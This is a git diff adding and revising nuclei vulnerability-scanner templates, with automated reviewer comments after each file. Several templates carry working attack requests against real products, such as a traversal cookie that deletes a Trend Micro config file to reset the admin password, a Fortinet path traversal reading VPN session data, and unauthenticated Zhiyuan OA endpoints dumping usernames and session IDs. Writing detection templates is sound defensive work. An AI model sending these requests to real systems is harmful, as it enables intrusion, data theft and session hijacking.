commit
4f4e83b173
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 200 | vulnerabilities | 94 | exposed-panels | 74 |
|
||||
| exposures | 52 | technologies | 46 | misconfiguration | 44 |
|
||||
| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 |
|
||||
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
|
||||
| workflows | 21 | miscellaneous | 12 | default-logins | 10 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**61 directories, 584 files**.
|
||||
**61 directories, 597 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-7552
|
||||
|
||||
info:
|
||||
name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
||||
tags: cve,cve2016
|
||||
|
||||
# This template exploits an authentication bypass vulnerability via a file delete in logoff.cgi
|
||||
# which resets the admin password back to 'admin' upon a reboot.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/logoff.cgi"
|
||||
headers:
|
||||
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "Backtrace"
|
||||
part: header
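Review bot: Nothing in `info` warns that this probe is destructive: by the template's own comment, the GET to `logoff.cgi` with the traversal `session_id` cookie deletes `igsa.conf`, and the admin password reverts to 'admin' on the next reboot, so a routine scan leaves the appliance weaker than it found it. Add a description that says so, e.g. `description: Destructive check - the request deletes /opt/TrendMicro/MinorityReport/etc/igsa.conf via logoff.cgi and the admin password resets to 'admin' on reboot; run only with explicit authorization.`, and tag it as intrusive if the project has such a tag so it can be excluded from default runs. The `Backtrace` header match presumably relies on the CGI erroring after the delete; confirm a patched appliance does not also return it, since the `200` status check on its own is not discriminating.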
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2017-7269
|
||||
|
||||
info:
|
||||
name: CVE-2017-7269
|
||||
author: thomas_from_offensity
|
||||
severity: critical
|
||||
description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2
|
||||
|
||||
# this was implemented based on the "check"-method in:
|
||||
# https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
|
||||
|
||||
requests:
|
||||
- method: OPTIONS
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "IIS/6.0"
|
||||
part: header
|
||||
- type: dsl
|
||||
dsl:
|
||||
- regex("<DAV:sql>", dasl) # lowercase header name: DASL
|
||||
- regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
|
||||
- regex(".*?PROPFIND", public) # lowercase header name: Public
|
||||
- regex(".*?PROPFIND", allow) # lowercase header name: Allow
|
||||
condition: or
|
||||
part: header
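Review bot: The matchers only fingerprint an IIS/6.0 host that answers OPTIONS with WebDAV verbs (`DAV`, `DASL`, `PROPFIND` in `Public`/`Allow`); they never exercise the `ScStoragePathFromUrl` overflow, so a host that has been patched but still exposes WebDAV would be reported as critical just the same. Say so in `description`, e.g. append `Fingerprint only (IIS 6.0 with WebDAV enabled); does not confirm the overflow - verify manually.`, and give the template the `reference:` and `tags:` fields the other new templates in this commit carry, e.g. `reference: https://github.com/danigargu/explodingcan` and `tags: cve,cve2017,iis,webdav,rce`, instead of a bare `name: CVE-2017-7269`. The `.*?` prefixes in the `Public`/`Allow` regexes are no-ops for an unanchored match and can be dropped.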
|
|
@ -9,8 +9,8 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||
- "{{BaseURL}}/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "var fgt_lang ="
|
||||
- "var fgt_lang"
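Review bot: With either `path` line, the body matcher only looks for the `fgt_lang` JavaScript wrapper, which is what the endpoint emits for any language file it serves; if a patched or unaffected device still answers a traversal `lang=` value with that wrapper rather than an error, the template reports a false positive, and loosening the word from `var fgt_lang =` to `var fgt_lang` widens that further. Worth confirming against a patched build, and if the wrapper is returned regardless, pair the word with a marker specific to the `sslvpn_websession` content or at least `matchers-condition: and` plus a `status: 200` matcher. The `requests` entry begins before this hunk and the matcher list may continue after it.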
|
||||
|
|
|
@ -34,3 +34,9 @@ requests:
|
|||
words:
|
||||
- "Contact Site Administrators"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "has not yet configured this contact form"
|
||||
part: body
|
||||
negative: true
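Review bot: A `negative: true` matcher only narrows the result when the template combines matchers with `matchers-condition: and`; under nuclei's default `or`, the new matcher fires on every response that lacks `has not yet configured this contact form`, turning the template into an always-match regardless of the `Contact Site Administrators` check above it. The `matchers-condition` key, if present, sits outside this hunk, so confirm it reads `and`, and if it is absent add `matchers-condition: and` above `matchers:`. The enclosing request definition starts before this hunk.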
|
|
@ -6,8 +6,7 @@ info:
|
|||
severity: medium
|
||||
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
|
||||
tags: cve,cve2020,oracle,xss
|
||||
|
||||
# https://twitter.com/HackerOn2Wheels/status/1326927875279380480
|
||||
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,4 +22,6 @@ requests:
|
|||
words:
|
||||
- "X-Oracle-Dms-Ecid:"
|
||||
- "X-Oracle-Dms-Rid:"
|
||||
- "Set-Cookie:"
|
||||
part: header
|
||||
condition: and
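Review bot: The header `word` list for an XSS template now includes `Set-Cookie:` under `condition: and`; that header is present on almost any session-bearing application, and together with the two `X-Oracle-Dms-*` headers the list fingerprints the Oracle stack rather than showing that the payload was reflected. If the request path (outside this hunk) carries the XSS payload, add a `part: body` matcher for the reflected marker and keep the header list as a secondary filter; otherwise this is a technology detection and the `xss` tag overstates it. Separately, `source:` is a one-off key — the other templates in this commit record URLs under `reference:` — so keep the tweet as a comment or fold it into `reference:` rather than introducing a new field.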
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2020-22840
|
||||
|
||||
info:
|
||||
name: CVE-2020-22840
|
||||
author: geeknik
|
||||
severity: low
|
||||
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
|
||||
tags: cve,cve2020,redirect,b2evolution
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
||||
part: header
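Review bot: The request hard-codes `email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR`, which looks like a value copied from the PoC's own instance; if `email_passthrough.php` checks the key against the `email_ID=1` record before redirecting, no other installation will redirect and the template silently yields false negatives — confirm against the b2evolution source. If the key is not validated (which would be what makes the redirect unauthenticated), record that next to the path, e.g. `# email_key is not validated by the vulnerable versions; any value works`, so the next reader does not have to re-derive it. A descriptive `name:` such as `name: b2evolution email_passthrough.php Open Redirect` would also match the other templates in this commit instead of repeating the id.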
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-21972
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthorized RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
|
||||
description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
|
||||
tags: cve,cve2021,vmware,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "VSPHERE-UI-JSESSIONID"
|
||||
part: header
|
||||
condtion: and
|
||||
- type: regex
|
||||
regex:
|
||||
- "(Install|Config) Final Progress"
|
||||
part: body
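Review bot: `condtion: and` on the `VSPHERE-UI-JSESSIONID` matcher is misspelled, so the key is either ignored or rejected at load time depending on how strictly the YAML is unmarshalled; on a one-word list it is also meaningless, so drop the line (or spell it `condition: and` if a second word is planned). `This templates only detects the plugin` should read `This template only detects the plugin`, and since the check confirms only that the vROps plugin endpoint answers, presumably a patched build exposing the same endpoint would still match — worth stating that the severity reflects the CVE, not the check.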
|
|
@ -0,0 +1,28 @@
|
|||
id: openapi
|
||||
|
||||
info:
|
||||
name: OpenAPI
|
||||
author: pdteam
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/openapi.json"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- application/openapi+json
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- openapi
|
||||
- paths
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
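Review bot: Requiring `application/openapi+json` in the response headers under `matchers-condition: and` means an `openapi.json` served as plain `application/json` — in practice the common case — is never reported, even though the body matcher (`openapi` and `paths`) already identifies the document. Either drop the header matcher or accept both media types, `- application/openapi+json` / `- application/json` (the word matcher's default `condition` is `or`). Tightening the body words to the quoted keys `"\"openapi\":"` and `"\"paths\":"` would also avoid matching on incidental prose.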
|
|
@ -56,6 +56,7 @@ requests:
|
|||
- "swagger:"
|
||||
- "\"swagger\":"
|
||||
- "Swagger UI"
|
||||
- "**token**:"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: bower-json
|
||||
|
||||
info:
|
||||
name: bower.json file disclosure
|
||||
author: oppsec
|
||||
severity: info
|
||||
description: Bower is a package manager which stores packages informations in bower.json file
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/bower.json"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "name"
|
||||
- "description"
|
||||
- "main"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
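Review bot: The body words `name`, `description` and `main` are so generic that nearly any JSON response carrying `application/json` — API error bodies, other package manifests — satisfies the `and` condition, so this is a weak check for one specific file. Match the JSON keys instead, as the swagger template in this commit does with `"\"swagger\":"`: `- "\"name\":"`, `- "\"description\":"`, `- "\"main\":"`. The description's `packages informations` should read `package information`.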
|
|
@ -0,0 +1,29 @@
|
|||
id: yarn-lock
|
||||
|
||||
info:
|
||||
name: yarn lock file disclosure
|
||||
author: oppsec
|
||||
severity: info
|
||||
description: yarn.lock is a file which store all exactly versions of each dependency were installed.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/yarn.lock"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY."
|
||||
- "# yarn lockfile v1"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
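Review bot: The header matcher demands `text/html` for `yarn.lock` under `matchers-condition: and`, but a lock file is plain text and servers typically label an unknown `.lock` extension `text/plain` or `application/octet-stream`, so genuine exposures would be missed while the two body markers (the autogenerated banner and `# yarn lockfile v1`) are already specific on their own. Drop the header matcher, or if the intent was to filter out HTML error pages that return 200, keep it with `negative: true`. The description should read `yarn.lock records the exact version of every installed dependency.`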
|
|
@ -5,16 +5,20 @@ info:
|
|||
author: pd-team
|
||||
severity: low
|
||||
tags: apache,rce
|
||||
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/ws/v1/cluster/apps/new-application'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'application-id'
|
||||
- application-id
|
||||
- maximum-resource-capability
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
matchers-condition: and
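Review bot: `severity: low` sits next to `tags: apache,rce` and a reference describing code execution through the unauthenticated ResourceManager REST API, and this commit adds the reference without reconciling the two. If the `new-application` endpoint is reachable without authentication and permits the application submission the article describes, `severity: critical` (or at least `high`) is the consistent value; if the template is meant only as exposure detection, the `rce` tag should go instead. The `info` block and the rest of the template start outside this hunk.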
|
|
@ -0,0 +1,26 @@
|
|||
id: zhiyuan-oa-info-leak
|
||||
|
||||
info:
|
||||
name: Zhiyuan Oa A6-s info Leak
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
|
||||
tags: zhiyuan,leak,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "attachment"
|
||||
- "application/x-msdownload"
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
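Review bot: The matchers confirm only that the servlet answered with a download (`attachment`, `application/x-msdownload`, status 200) and never inspect the body, so an empty or error spreadsheet is reported the same as one containing the user list; the request itself, with `contenttype=username` and an empty `contentvalue`, appears to pull the whole export of account names from an unauthenticated endpoint. Reconsider `severity: info` — disclosure of every username without credentials is at least `low`, and the sibling `zhiyuan-oa-session-leak` template rates its disclosure `medium` — and add a description saying what is downloaded, e.g. `description: DownExcelBeanServlet exports the user list as an Excel file without authentication.`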
|
|
@ -0,0 +1,26 @@
|
|||
id: zhiyuan-oa-session-leak
|
||||
|
||||
info:
|
||||
name: Zhiyuan Oa Session Leak
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.zhihuifly.com/t/topic/3345
|
||||
tags: zhiyuan,leak,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<usrID>"
|
||||
- "<sessionID>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
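Review bot: `severity: medium` understates what `getSessionList.jsp?cmd=getAll` returns — `<usrID>`/`<sessionID>` pairs for every active session, per the matchers — because if those IDs are accepted as session tokens, as the reference's framing suggests, any unauthenticated caller can take over logged-in accounts, which is `high` or `critical`. Add a `description:` stating the impact, e.g. `description: getSessionList.jsp returns the usrID and sessionID of every active session without authentication; the IDs can be replayed to hijack sessions.`, confirming the replay claim against the reference before committing it.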
|